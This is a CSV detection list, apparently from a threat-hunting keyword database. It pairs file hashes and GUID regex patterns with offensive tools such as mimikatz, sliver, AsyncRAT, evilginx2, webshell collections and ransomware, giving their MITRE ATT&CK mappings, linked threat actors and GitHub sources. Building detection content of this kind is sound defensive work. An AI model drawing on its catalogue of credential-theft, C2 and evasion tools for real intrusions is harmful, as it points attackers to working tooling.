"*76e94a8b2541bd3c626fa5ac014d78665088f69c3b95925ea4211e68827fa1c0*",".{0,1000}76e94a8b2541bd3c626fa5ac014d78665088f69c3b95925ea4211e68827fa1c0.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","29205"
"*76f677acfe19ca1e1e39c391e4923dc38e1e3f752097c5808c171c1d5228194e*",".{0,1000}76f677acfe19ca1e1e39c391e4923dc38e1e3f752097c5808c171c1d5228194e.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","#filehash","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","29207"
"*76FFA92B-429B-4865-970D-4E7678AC34EA*",".{0,1000}76FFA92B\-429B\-4865\-970D\-4E7678AC34EA.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","#GUIDproject","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","29208"
"*77025f0392d2811d58e8835a03671c0cbbf40f112f1c9cf3c6e864fdb1effa0a*",".{0,1000}77025f0392d2811d58e8835a03671c0cbbf40f112f1c9cf3c6e864fdb1effa0a.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29209"
"*770553a2a159b19371ea923733997ed2ff71a9e01a04342d1a7fb61c30eed968*",".{0,1000}770553a2a159b19371ea923733997ed2ff71a9e01a04342d1a7fb61c30eed968.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29211"
"*770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621*",".{0,1000}770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29213"
"*7716e96debd76da60e286c09150ced547e6e7ed8cba8231d0612d92941833591*",".{0,1000}7716e96debd76da60e286c09150ced547e6e7ed8cba8231d0612d92941833591.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#filehash","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","29214"
"*7722284741f36f9fc0bff4902aa9ef837b3635c8b2dd43b58b051c1f08f52a53*",".{0,1000}7722284741f36f9fc0bff4902aa9ef837b3635c8b2dd43b58b051c1f08f52a53.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29215"
"*77227879203ee0e49d64978edc6f40c590df6e1bb6260f65340fc713880301e8*",".{0,1000}77227879203ee0e49d64978edc6f40c590df6e1bb6260f65340fc713880301e8.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","29216"
"*7728f463c0a51beb209f57662d104263852cfeb2dae58e5903eea3e2bcaea904*",".{0,1000}7728f463c0a51beb209f57662d104263852cfeb2dae58e5903eea3e2bcaea904.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29218"
"*772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7*",".{0,1000}772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29219"
"*7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1*",".{0,1000}7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","29224"
"*7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57*",".{0,1000}7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29226"
"*774a849a2238d98f47427589292c7d1e95a3777631f0afc8787f0a32b0dd2d03*",".{0,1000}774a849a2238d98f47427589292c7d1e95a3777631f0afc8787f0a32b0dd2d03.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29232"
"*774f93b89388143ef4f6a9752b171f3a337bf7523b236e6719703a239d56cab2*",".{0,1000}774f93b89388143ef4f6a9752b171f3a337bf7523b236e6719703a239d56cab2.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29234"
"*775aff05c1b0ffd703c1b517169770ac9f4aee6a12a30b2b51b5cdb19e7c85c3*",".{0,1000}775aff05c1b0ffd703c1b517169770ac9f4aee6a12a30b2b51b5cdb19e7c85c3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29235"
"*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29236"
"*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#GUIDproject","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29237"
"*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#GUIDproject","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29238"
"*7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29*",".{0,1000}7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29239"
"*77612014-2E37-4E17-AAFE-9AD4F08B4263*",".{0,1000}77612014\-2E37\-4E17\-AAFE\-9AD4F08B4263.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","29240"
"*7767C300-5FD5-4A5D-9D4C-59559CCE48A3*",".{0,1000}7767C300\-5FD5\-4A5D\-9D4C\-59559CCE48A3.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","29241"
"*7767C300-5FD5-4A5D-9D4C-59559CCE48A3*",".{0,1000}7767C300\-5FD5\-4A5D\-9D4C\-59559CCE48A3.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","29242"
"*7776b5b62b66f36a15558f7004bb319a16a2d68c11bc66b0795ee72866c08e49*",".{0,1000}7776b5b62b66f36a15558f7004bb319a16a2d68c11bc66b0795ee72866c08e49.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29246"
"*7778bc98c2588b9136c61b72f7a4120c418ccc2233e3389f239c822eca92db15*",".{0,1000}7778bc98c2588b9136c61b72f7a4120c418ccc2233e3389f239c822eca92db15.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29249"
"*777d2f709701210daa2b14af49128fbc4949d120f1d112b1c4d5a1453318d89f*",".{0,1000}777d2f709701210daa2b14af49128fbc4949d120f1d112b1c4d5a1453318d89f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29250"
"*777d789fe076804229d09cae4fd8abbab955c683ccc11195639b88cc6567786b*",".{0,1000}777d789fe076804229d09cae4fd8abbab955c683ccc11195639b88cc6567786b.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#filehash","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","29251"
"*77849d97ebdb4c100d7195a3904fb6b829219bb9f8df46dd81151550546da532*",".{0,1000}77849d97ebdb4c100d7195a3904fb6b829219bb9f8df46dd81151550546da532.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#filehash","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","29252"
"*7785670d773d00ffc6e223c4c3ccb1ce7d714204329b12536fd128f80fdfcef9*",".{0,1000}7785670d773d00ffc6e223c4c3ccb1ce7d714204329b12536fd128f80fdfcef9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29253"
"*77873f1f629ff4f8635b50544849c7904db358ee87733f42f3bcb19c87da2eab*",".{0,1000}77873f1f629ff4f8635b50544849c7904db358ee87733f42f3bcb19c87da2eab.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29254"
"*7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e*",".{0,1000}7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29255"
"*778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955*",".{0,1000}778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29257"
"*77922162f5272f854af4755ff5bb43331b2e63f7cedc7efc30dd6bb3549b2cd0*",".{0,1000}77922162f5272f854af4755ff5bb43331b2e63f7cedc7efc30dd6bb3549b2cd0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29259"
"*7794d2cb665c264f4cda6652c30e727965a5f5ea10e258df5d00d9765ee24910*",".{0,1000}7794d2cb665c264f4cda6652c30e727965a5f5ea10e258df5d00d9765ee24910.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29260"
"*7798bda9fc4f194ab8e0d876a27326abe016f35eddd6799696670c45888475c0*",".{0,1000}7798bda9fc4f194ab8e0d876a27326abe016f35eddd6799696670c45888475c0.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","29261"
"*779eedf10f0ae805b84e8cc0cd97f4861f0818eefa4ccf087d1c875db1d1c5e3*",".{0,1000}779eedf10f0ae805b84e8cc0cd97f4861f0818eefa4ccf087d1c875db1d1c5e3.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#filehash","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","29262"
"*77aacde6d6933ca07fef4f91b408dc58d12dc222dc5212fd291ac49c2b81a635*",".{0,1000}77aacde6d6933ca07fef4f91b408dc58d12dc222dc5212fd291ac49c2b81a635.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29263"
"*77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db*",".{0,1000}77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","29264"
"*77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571*",".{0,1000}77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29265"
"*77b5efcc93bb859a7c5667dd2e21c7cc2fb7d9bef1237875bb4dbfb1c96cc194*",".{0,1000}77b5efcc93bb859a7c5667dd2e21c7cc2fb7d9bef1237875bb4dbfb1c96cc194.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29266"
"*77b681a78da38b33f408ccdc747438550186a348f670d2faaa05ef75f9337973*",".{0,1000}77b681a78da38b33f408ccdc747438550186a348f670d2faaa05ef75f9337973.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29267"
"*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*",".{0,1000}77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","29268"
"*77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121*",".{0,1000}77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","29271"
"*77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121*",".{0,1000}77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","29272"
"*77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6*",".{0,1000}77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29273"
"*77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6*",".{0,1000}77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 